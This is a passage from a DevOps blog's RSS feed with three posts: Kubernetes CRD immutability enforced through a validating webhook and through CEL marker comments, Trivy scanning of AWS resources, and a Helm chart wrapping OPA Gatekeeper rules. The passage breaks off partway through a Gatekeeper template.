]]></content:encoded></item><item><title><![CDATA[Kubernetes CRD validation with CEL and kubebuilder marker comments]]></title><description><![CDATA[Kubernetes comes with resources like Pods, Deployments, Configmaps, PersistentVolumes & many more. Kubernetes is extensible & allows users to create Custom Resources (CR). Before creating a CR, it's required to create a Custom Resource Definition (CR...]]></description><link>https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments</link><guid isPermaLink="true">https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Go Language]]></category><category><![CDATA[Operators]]></category><category><![CDATA[Validation]]></category><category><![CDATA[kubebuilder]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 12 Oct 2022 11:01:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1665570079795/f3OUh3xqq.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes comes with resources like Pods, Deployments, Configmaps, PersistentVolumes &amp; many more. Kubernetes is extensible &amp; allows users to create Custom Resources (CR). Before creating a CR, it's required to create a Custom Resource Definition (CRD) that will define the structure &amp; meta-attributes of the future resource.</p>
<blockquote>
<p>For example, the Prometheus Operator adds a "PrometheusRule" resource. Alerts can be defined and edited with <code>kubectl edit prometheusrule some-rule</code>.</p>
<p>- Natan Yellin, CEO Robusta.dev</p>
</blockquote>
<p>There are many ways to create CRDs for Kubernetes. You can write CRDs from scratch as well, but some amazing tools out there will scaffold the skeleton structure for you to make things easier. A few of them are <a target="_blank" href="https://github.com/kubernetes-sigs/kubebuilder">kubebuilder</a>, <a target="_blank" href="https://github.com/operator-framework/operator-sdk">operator-sdk</a>, etc.</p>
<p>Kubernetes operators require you to define &amp; create CRDs. Often, when you develop operators, the basic requirement would be validating different fields in CRDs. There are many ways in kubebuilder to perform basic validations like setting maximum/minimum length of a field, required/optional validation checks for a field, etc.</p>
<p>Before Kubernetes 1.25, the only way to create complex validations in CRDs was to write &amp; deploy a validating webhook. Each CRD would have its own validating webhook deployment running on the system. This is an operational &amp; development overhead when you have to develop &amp; deploy numerous CRDs. This issue is addressed in the Kubernetes 1.25 release with the introduction of <a target="_blank" href="https://github.com/google/cel-spec">CEL(Common Expression Language)</a> validation rules. In this post, we will see the process of creating immutable CRDs before &amp; after introduction of CEL in Kubernetes.</p>
<h2 id="heading-warning">Warning!!!</h2>
<p>Kindly note this feature is still in the beta phase &amp; is subject to changes. The following sections assume you know basics of Golang, Kubernetes, &amp; operator development.</p>
<h2 id="heading-task">Task</h2>
<p>In this demo, we will try to create an immutable CRD, i.e., no one can edit the object once the CR is made. If someone tries to edit the object, the API server must reject the change &amp; throw an error.</p>
<p>For this demo, we will use kubebuilder. Code available here - <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook">rewanthtammana/crd-immutable-validation-webhook</a></p>
<h3 id="heading-crd-validation-in-kubernetes-123">CRD validation in Kubernetes 1.23</h3>
<p>As mentioned above, we need to create a webhook for validation. But before that, let's scaffold the skeleton.</p>
<ol>
<li><p>Create a Kubernetes 1.23 cluster</p>
</li>
<li><p>Create a repository &amp; initialize it with go mod.</p>
<pre><code class="lang-bash"> mkdir /tmp/one <span class="hljs-built_in">cd</span> /tmp/one go mod init one
</code></pre>
</li>
<li><p>Initialize kubebuilder</p>
<p> On M1,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span> --plugins=go/v4-alpha
</code></pre>
<p> Others,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span>
</code></pre>
</li>
<li><p>Create an API with <code>ImmutableKind</code>. Say yes to creating a controller &amp; resource.</p>
<pre><code class="lang-bash"> kubebuilder create api --version v1 --group validate --kind ImmutableKind
</code></pre>
</li>
<li><p>Create a webhook for validation</p>
<pre><code class="lang-bash"> kubebuilder create webhook --group validate --version v1 --kind ImmutableKind --programmatic-validation
</code></pre>
</li>
<li><p>Add the validating webhook logic to the codebase, <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-webhook/api/v1/immutablekind_webhook.go">api/v1/immutablekind_webhook.go</a>. In this case, we want our object to be immutable, so all update operations must be blocked.</p>
<pre><code class="lang-go"> <span class="hljs-comment">// ValidateUpdate implements webhook.Validator so a webhook will be registered for the type</span>
 <span class="hljs-function"><span class="hljs-keyword">func</span> <span class="hljs-params">(r *ImmutableKind)</span> <span class="hljs-title">ValidateUpdate</span><span class="hljs-params">(old runtime.Object)</span> <span class="hljs-title">error</span></span> {
 immutablekindlog.Info(<span class="hljs-string">"validate update"</span>, <span class="hljs-string">"name"</span>, r.Name)

 <span class="hljs-keyword">return</span> apierrors.NewForbidden(
     schema.GroupResource{
         Group:    <span class="hljs-string">"validate.rewanthtammana.com"</span>,
         Resource: <span class="hljs-string">"ImmutableKind"</span>,
     }, r.Name, &amp;field.Error{
         Type:     field.ErrorTypeForbidden,
         Field:    <span class="hljs-string">"*"</span>,
         BadValue: r.Name,
         Detail:   <span class="hljs-string">"Invalid value: \"object\": Value is immutable"</span>,
     },
 )
 }
</code></pre>
</li>
<li><p>The default webhook will not work because of certificate issues. To fix this, you must install <code>cert-manager</code> for operational ease.</p>
<pre><code class="lang-bash"> kubectl apply -f https://github.com/cert-manager/cert-manager/releases/download/v1.9.1/cert-manager.yaml
</code></pre>
</li>
<li><p>Edit configurations from the skeleton to enable webhook, perform cainjection, etc. deployments</p>
</li>
<li><p>Uncomment <code>patches/webhook_in_immutablekinds.yaml</code> and <code>patches/cainjection_in_immutablekinds.yaml</code> in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-webhook/config/crd/kustomization.yaml">config/crd/kustomization.yaml</a></p>
</li>
<li><p>Uncomment <code>../certmanager</code> and <code>../webhook</code> directories, <code>manager_webhook_patch.yaml</code> &amp; entire <code>CERTMANAGER</code> replacements block in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-webhook/config/default/kustomization.yaml">config/default/kustomization.yaml</a></p>
</li>
<li><p>Create custom CRDs</p>
<pre><code class="lang-bash">make manifests
</code></pre>
</li>
<li><p>Build &amp; push the webhook code logic to dockerhub. In this case, I'm pushing the image to my personal dockerhub account for deployment. You can change the image name accordingly.</p>
<pre><code class="lang-bash">make docker-build docker-push IMG=rewanthtammana/immutablekindwebhook:v1
</code></pre>
</li>
<li><p>Install &amp; deploy the CRD &amp; webhook</p>
<pre><code class="lang-bash">make install deploy IMG=rewanthtammana/immutablekindwebhook:v1
</code></pre>
</li>
<li><p>Deploy a sample CR.</p>
<pre><code class="lang-bash">kubectl apply -f ./config/samples/validate_v1_immutablekind.yaml
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">validate.rewanthtammana.com/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ImmutableKind</span>
<span class="hljs-attr">metadata:</span>
<span class="hljs-attr">labels:</span>
<span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">immutablekind</span>
<span class="hljs-attr">app.kubernetes.io/instance:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">app.kubernetes.io/part-of:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">app.kuberentes.io/managed-by:</span> <span class="hljs-string">kustomize</span>
<span class="hljs-attr">app.kubernetes.io/created-by:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">mutate:</span> <span class="hljs-string">maybe</span>
<span class="hljs-attr">name:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">spec:</span>
<span class="hljs-comment"># TODO(user): Add fields here</span>
</code></pre>
</li>
<li><p>To validate the immutability feature let's edit the deployed CR.</p>
</li>
<li><p>To keep things simple, let's remove all labels from the above snippet &amp; just deploy the <code>immutablekind-sample</code> CR again.</p>
<pre><code class="lang-yaml"><span class="hljs-string">echo</span> <span class="hljs-string">"apiVersion: validate.rewanthtammana.com/v1
kind: ImmutableKind
metadata:
  name: immutablekind-sample"</span> <span class="hljs-string">|</span> <span class="hljs-string">kubectl</span> <span class="hljs-string">apply</span> <span class="hljs-string">-f-</span>
</code></pre>
</li>
<li><p>The Kubernetes API server should throw an error blocking the update.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1665314307178/20Zu36wl0.png" alt="image.png" /></p>
</li>
</ol>
<h3 id="heading-crd-validation-in-kubernetes-125">CRD validation in Kubernetes 1.25</h3>
<p>With the introduction of fantastic CEL, we can see a clear difference in the complexity of implementing CRD validation. The initial scaffolding steps are gonna remain the same.</p>
<ol>
<li><p>Create a Kubernetes 1.25 cluster</p>
</li>
<li><p>Create a repository &amp; initialize it with go mod.</p>
<pre><code class="lang-bash"> mkdir /tmp/two
 <span class="hljs-built_in">cd</span> /tmp/two
 go mod init two
</code></pre>
</li>
<li><p>Initialize kubebuilder</p>
<p> On M1,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span> --plugins=go/v4-alpha
</code></pre>
<p> Others,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span>
</code></pre>
</li>
<li><p>Create an API with <code>ImmutableKind</code>. Say yes to creating a controller &amp; resource.</p>
<pre><code class="lang-bash"> kubebuilder create api --version v1 --group validate --kind ImmutableKind
</code></pre>
</li>
<li><p>No need to create a webhook for CRD validation with CEL</p>
</li>
<li><p>We aren't validating a specific field in this task. We want to protect the entire object &amp; all its subsequent fields</p>
</li>
<li><p>The best way to achieve our goal is to embed the kubebuilder marker comments for the entire kind struct object</p>
</li>
<li><p>The CEL immutable validation check looks as below</p>
<pre><code class="lang-bash"> // +kubebuilder:validation:XValidation:rule=<span class="hljs-string">"self == oldSelf"</span>, message=<span class="hljs-string">"Value is immutable"</span>
</code></pre>
</li>
<li><p>The above marker comment in CEL format is parsed by controller-gen to generate CRDs. The <code>XValidation</code> field in CEL rule translates to <code>x-Kubernetes-validation</code> in the CRD</p>
</li>
<li><p>The validation rule specified above, ensures that the new request object (<code>self</code>) is always equal to the old deployed object (<code>oldSelf</code>). If it's any different, the CEL validation throws an error message</p>
</li>
<li><p>A lot more granular validation on each field is possible with CEL. But it's not required for our demo use case</p>
</li>
<li><p>In this case, we created <code>ImmutableKind</code> struct &amp; want to make sure it's CRs are immutable. Add the above validation marker comments to the struct</p>
</li>
<li><p>The <code>ImmutableKind</code> struct exists in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-markers/api/v1/immutablekind_types.go">api/v1/immutablekind_types.go</a></p>
<pre><code class="lang-go"><span class="hljs-comment">// +kubebuilder:validation:XValidation:rule="self == oldSelf", message="Value is immutable"</span>
<span class="hljs-keyword">type</span> ImmutableKind <span class="hljs-keyword">struct</span> {
metav1.TypeMeta   <span class="hljs-string">`json:",inline"`</span>
metav1.ObjectMeta <span class="hljs-string">`json:"metadata,omitempty"`</span>

Spec   ImmutableKindSpec   <span class="hljs-string">`json:"spec,omitempty"`</span>
Status ImmutableKindStatus <span class="hljs-string">`json:"status,omitempty"`</span>
}
</code></pre>
</li>
<li><p>Create custom CRDs &amp; install them</p>
<pre><code class="lang-bash">make manifests
make install
</code></pre>
</li>
<li><p>Deploy a sample CR</p>
<pre><code class="lang-bash">kubectl apply -f ./config/samples/validate_v1_immutablekind.yaml
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">validate.rewanthtammana.com/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ImmutableKind</span>
<span class="hljs-attr">metadata:</span>
<span class="hljs-attr">labels:</span>
<span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">immutablekind</span>
<span class="hljs-attr">app.kubernetes.io/instance:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">app.kubernetes.io/part-of:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">app.kuberentes.io/managed-by:</span> <span class="hljs-string">kustomize</span>
<span class="hljs-attr">app.kubernetes.io/created-by:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">mutate:</span> <span class="hljs-string">maybe</span>
<span class="hljs-attr">name:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">spec:</span>
<span class="hljs-comment"># TODO(user): Add fields here</span>
</code></pre>
</li>
<li><p>To validate the immutability feature, let's edit the deployed CR.</p>
</li>
<li><p>To keep things simple, let's remove all labels from the above snippet &amp; just deploy the <code>immutablekind-sample</code> CR again.</p>
<pre><code class="lang-yaml"><span class="hljs-string">echo</span> <span class="hljs-string">"apiVersion: validate.rewanthtammana.com/v1
kind: ImmutableKind
metadata:
  name: immutablekind-sample"</span> <span class="hljs-string">|</span> <span class="hljs-string">kubectl</span> <span class="hljs-string">apply</span> <span class="hljs-string">-f-</span>
</code></pre>
</li>
<li><p>The object update request will be failed.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1665317010497/BQ3GVEVX5.png" alt="image.png" /></p>
</li>
</ol>
<h2 id="heading-peek-into-marker-comments-magic">Peek into marker comments magic</h2>
<p>Just a one-line marker comment, removed all the complexity of creating a webhook deployment, certificate management/requirement of cert-manager deployment, etc.</p>
<p>The CRD configuration is located in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-markers/config/crd/bases/validate.rewanthtammana.com_immutablekinds.yaml#L50">./config/crd/bases/validate.rewanthtammana.com_immutablekinds.yaml</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1665317592248/XRgfoe5Ud.png" alt="image.png" /></p>
<p>The above marker comment embeds <code>x-Kubernetes-validations</code> field to <code>openAPIV3Schema</code> when you generate the manifest files.</p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>This is just the tip of the iceberg. We can achieve numerous other things with the combination of CEL &amp; Kubernetes. You can check the references for further usage.</p>
<h2 id="heading-references">References</h2>
<ul>
<li><p><a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/">Demo codebase</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/google/cel-spec">CEL</a></p>
</li>
<li><p><a target="_blank" href="https://book.kubebuilder.io/">Kubebuilder</a></p>
</li>
<li><p><a target="_blank" href="https://kubernetes.io/blog/2022/09/29/enforce-immutability-using-cel/">Kubernetes Blog</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Trivy: Enhanced with AWS scan integration]]></title><description><![CDATA[Trivy is one of the most reliable open-source tools for image scanning. Primarily famous for its incredible image scanning, it also supports scanning Kubernetes clusters/resources, file systems & git repositories for misconfigurations & security vuln...]]></description><link>https://blog.rewanthtammana.com/trivy-enhanced-with-aws-scan-integration</link><guid isPermaLink="true">https://blog.rewanthtammana.com/trivy-enhanced-with-aws-scan-integration</guid><category><![CDATA[trivy]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Security]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sun, 21 Aug 2022 08:43:23 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1661071750027/YbwVjne1P.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><a target="_blank" href="https://github.com/aquasecurity/trivy/">Trivy</a> is one of the most reliable open-source tools for image scanning. Primarily famous for its incredible image scanning, it also supports scanning Kubernetes clusters/resources, file systems &amp; git repositories for misconfigurations &amp; security vulnerabilities.</p>
<p>Thanks to <a target="_blank" href="https://twitter.com/urlichsanais">Anaïs Urlichs</a> for inviting me to the beta &amp; early adopters review.</p>
<p>As of Aug 15, 2022, Trivy is capable of scanning AWS resources for misconfigurations. The less known fact is that <a target="_blank" href="https://www.aquasec.com/">aquasec</a> acquired <a target="_blank" href="https://github.com/aquasecurity/cloudsploit">cloudsploit</a>, a Cloud Security Posture Management (CSPM) tool that supports AWS, GCP, Azure, Oracle, etc. It even covers standards like HIPPA, PCI &amp; CIS benchmarks. For unforeseen reasons, cloudsploit didn't receive any updates since Aug 26, 2020. Nevertheless, now trivy can perform scans cloudsploit was capable of &amp; beyond.</p>
<h2 id="heading-hands-on">Hands-on</h2>
<p>Kindly note that this is still an experimental phase. As of this writing, Trivy supports scanning 31 types of AWS resources for misconfiguration.</p>
<h3 id="heading-authenticate-to-aws-account">Authenticate to AWS account</h3>
<pre><code class="lang-bash">aws configure
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007750068/w50Zp8KQE.png" alt="aws-authentication.png" /></p>
<h3 id="heading-scan-all-resources-in-the-default-region">Scan all resources in the default region</h3>
<p>The region set during <code>aws configure</code> will be picked up! This returns the summary/count of misconfigurations for supported resources.</p>
<pre><code class="lang-bash">trivy aws
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007794388/r9d3cMOv5.png" alt="aws-scan-default-region.png" /></p>
<h3 id="heading-scan-all-resources-in-a-specific-region">Scan all resources in a specific region</h3>
<pre><code class="lang-bash">trivy aws --region=us-east-1
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007808954/S14wq58bk.png" alt="aws-scan-different-region.png" /></p>
<p>The list can be lengthy and exhaustive to understand. The <code>service</code> feature comes to the rescue.</p>
<h3 id="heading-scan-a-single-resource">Scan a single resource</h3>
<p>The service feature shows more information on the misconfigurations.</p>
<pre><code class="lang-bash">trivy aws --service=ec2
trivy aws --service=ec2 --region=eu-west-1
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007831350/ByF6Hx79a.png" alt="aws-scan-ec2.png" /></p>
<h3 id="heading-format-output">Format output</h3>
<p>Trivy supports multiple output formats, table, json, sarif, cosign-vuln, github, spdx, cyclonedx &amp; lot more.</p>
<p>Sarif format allows us to view things visually better.</p>
<pre><code class="lang-bash">trivy aws --service=s3 --format=sarif --output=aws-s3-output.sarif
</code></pre>
<p><strong>NOTE: If you have multiple misconfigurations/sensitive information in your output, DO NOT upload the results to an online website. Try setting up a local sarif viewer.</strong></p>
<p>I don't have any sensitive information in my output, so I'm uploading them to an online <a target="_blank" href="https://microsoft.github.io/sarif-web-component/">sarif viewer</a> from Microsoft. The output is clean &amp; simple to digest.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007925831/QafKTM4hd.png" alt="aws-s3-scan-sarif-ui-viewer.png" /></p>
<h3 id="heading-filter-results-based-on-vulnerability-severity">Filter results based on vulnerability severity</h3>
<pre><code class="lang-bash">trivy aws --service=s3
trivy aws --service=s3 --severity=MEDIUM
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007949744/glBHrM7si.png" alt="aws-scan-severity-filter.png" /></p>
<h3 id="heading-more-features">More features</h3>
<p>Trivy got several features like updating the local cache &amp; filters like account, arn, endpoint, etc.</p>
<h2 id="heading-references">References</h2>
<p><a target="_blank" href="https://aquasecurity.github.io/trivy/v0.31.0/docs/cloud/aws/scanning/">https://aquasecurity.github.io/trivy/v0.31.0/docs/cloud/aws/scanning/</a>
<a target="_blank" href="https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-standards-cis.html">https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-standards-cis.html</a></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>This is a massive enhancement from Trivy to integrate cloud/IaC scanning features into its arsenal. Though it's in the experimental phase, the scanning coverage &amp; features are impressive. We can be sure Trivy plans to integrate more features related to AWS &amp; move to other cloud provider integrations, thus making it the center for scanning universe.</p>
]]></content:encoded></item><item><title><![CDATA[Gatekeeper Rules Helm Library]]></title><description><![CDATA[With the deprecation of Pod Security Policies in Kubernetes 1.24 and the re-introduction of it as an admission controller which is still in the beta phase, it's complicated to use PSP/equivalent in larger organizations. We can use them but it's still...]]></description><link>https://blog.rewanthtammana.com/gatekeeper-rules-helm-library</link><guid isPermaLink="true">https://blog.rewanthtammana.com/gatekeeper-rules-helm-library</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[YAML]]></category><category><![CDATA[Helm]]></category><category><![CDATA[GitHub]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sat, 18 Jun 2022 13:06:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1655554604515/OEwltVeNB.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>With the deprecation of Pod Security Policies in Kubernetes 1.24 and the re-introduction of it as an admission controller which is still in the beta phase, it's complicated to use PSP/equivalent in larger organizations. We can use them but it's still in the beta phase, so we aren't sure of the surprises Kubernetes is gonna bring us. So, what can we do about it?</p>
<h2 id="heading-introduction-to-admission-webhooks">Introduction to Admission Webhooks</h2>
<p><a target="_blank" href="https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/">Admission webhooks</a> in Kubernetes allows us to enforce policies to resource creations &amp; deployments. Some tools help us to write extensible policies to achieve better control over the environment like OPA Gatekeeper, Kyverno, etc.</p>
<h2 id="heading-challenges">Challenges</h2>
<p>OPA Gatekeeper rules are written in Rego language which is a pain to write &amp; maintain. Kyverno offers a much simpler solution but it's not very flexible/extensible like OPA Gatekeeper. Though Gatekeeper is having complexity, it's effective to write custom rules according to the infrastructure.</p>
<p>For infrastructures compromising different teams/large numbers, it's easier to go with Kyverno/similar for the ease of getting started. But if we want to achieve granular level customizations, we have to go with OPA Gatekeeper. It's often complex to write rego rules for each customization. How do we achieve this?</p>
<h2 id="heading-solution">Solution</h2>
<p>We need to develop a solution that's extensible, easy to use &amp; maintain. The gatekeeper team has done an amazing job with creating a <a target="_blank" href="https://github.com/open-policy-agent/gatekeeper-library">library of rules</a>. This helps to achieve a better understanding of the different rules we can write in OPA Gatekeeper.</p>
<p>If that's amazing, where's the catch? Well, it's easy to use but difficult to configure when we want to use it across multiple teams/clusters. The developers/DevOps/other teams have to dive into the templates &amp; CRDs to further customize it. Unfortunately, not everyone is good with customizing rego rules/editing templates. Also, it's not an ideal approach to create multiple files for each customization.</p>
<p>Taking inspiration from the OPA team's work on <a target="_blank" href="https://github.com/open-policy-agent/gatekeeper-library">rules library</a>, we have <strong>customized their work to integrate with</strong> <a target="_blank" href="https://helm.sh"><strong>Helm</strong></a>.</p>
<p>Now, developers/DevOps/other teams can install rules with just the <code>helm install</code> command. Since we are using helm, the values of all templates/CRDs are available in <code>values.yaml</code>. This single file works as an interface for the end-users to understand/gain information on the list of rules/policies that are applied.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Source: https://github.com/rewanthtammana/gatekeeper-rules-helm-library/blob/main/values.yaml</span>

<span class="hljs-attr">globalImport:</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span>

<span class="hljs-attr">K8sPSPAllowPrivilegeEscalationContainer:</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span>  <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span>  <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">"Cluster"</span>

<span class="hljs-attr">K8sPSPCapabilities:</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">true</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">"Cluster"</span>
  <span class="hljs-attr">parameters:</span>
    <span class="hljs-attr">allowedCapabilities:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"hello"</span>
    <span class="hljs-attr">requiredDropCapabilities:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"KILL"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"MKNOD"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"SETUID"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"SETGID"</span>
    <span class="hljs-attr">exemptImages:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"nginx:latest"</span>

<span class="hljs-string">...</span>
</code></pre>
<p>In daily use, there will be occurrences where we have to add exclusions like excluding a namespace from the specific rule(s). So, we have created something called <code>globalExcludeNamespace</code> in <code>values.yaml</code>. You can add the list of namespaces you want to exclude at the global level. The helm template will parse the input &amp; add the list of namespaces at the global level in the exclusion list for all rules. You can override this exclusion by toggling the <code>excludeNamespacesDefaultFlag</code> variable. This makes it easy to organize &amp; understand things. Similarly, we have given a feature to specify <code>includeNamespacesDefaultFlag</code> but it's recommended not to use it because by default the rules are applied for all namespaces.</p>
<p>Helm installation gives the luxury of creating multiple releases with a different set of rules like one chart for PSPs, one chart for general rules, etc. You can edit/delete the set of rules easily with helm.</p>
<p><code>helm list -A</code> will return the list of installed release information.</p>
<h2 id="heading-code-outline-andamp-structure">Code outline &amp; structure</h2>
<p>Each rule/entry in <code>values.yaml</code> looks something like this. You can tweak the values accordingly &amp; customize the templating according to your use case.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">K8sPSPForbiddenSysctls:</span>
  <span class="hljs-attr">includeNamespacesDefaultFlag:</span> <span class="hljs-literal">true</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">excludeNamespacesDefaultFlag:</span> <span class="hljs-literal">false</span> <span class="hljs-comment">#Overrides global flag. Remove field, if not required</span>
  <span class="hljs-attr">includeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span>
  <span class="hljs-attr">excludeNamespaces:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"kube-system"</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">"Cluster"</span>
  <span class="hljs-attr">parameters:</span>
    <span class="hljs-attr">forbiddenSysctls:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"*"</span>
</code></pre>
<p>The associated template for the above rule looks like as below.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Source: https://github.com/rewanthtammana/gatekeeper-rules-helm-library/blob/main/templates/pod-security-policy/forbidden-sysctls.yaml</span>

{{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">-</span>}}
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">constraints.gatekeeper.sh/v1beta1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">K8sPSPForbiddenSysctls</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">psp-forbidden-sysctls-{{.Release.Name}}</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">match:</span>
    <span class="hljs-attr">kinds:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">""</span>]
        <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">custom</span> <span class="hljs-string">values</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span>}}
    {{<span class="hljs-bullet">-</span> <span class="hljs-string">if</span> <span class="hljs-string">or</span> <span class="hljs-string">(.Values.K8sPSPForbiddenSysctls.includeNamespaces)</span> <span class="hljs-string">(hasKey</span> <span class="hljs-string">.Values.K8sPSPForbiddenSysctls</span> <span class="hljs-string">"includeNamespacesDefaultFlag"</span><span class="hljs-string">)</span>}}
    {{<span class="hljs-string">/*</span> <span class="hljs-string">Check</span> <span class="hljs-string">if</span> <span class="hljs-string">any</span> <span class="hljs-string">specific</span> <span class="hljs-string">namespaces</span> <span class="hljs-string">are</span> <span class="hljs-string">defined</span> <span class="hljs-string">*/</span> <span class="hljs-string">-</span>}}
    <span class="hljs-attr">namespaces:</span>
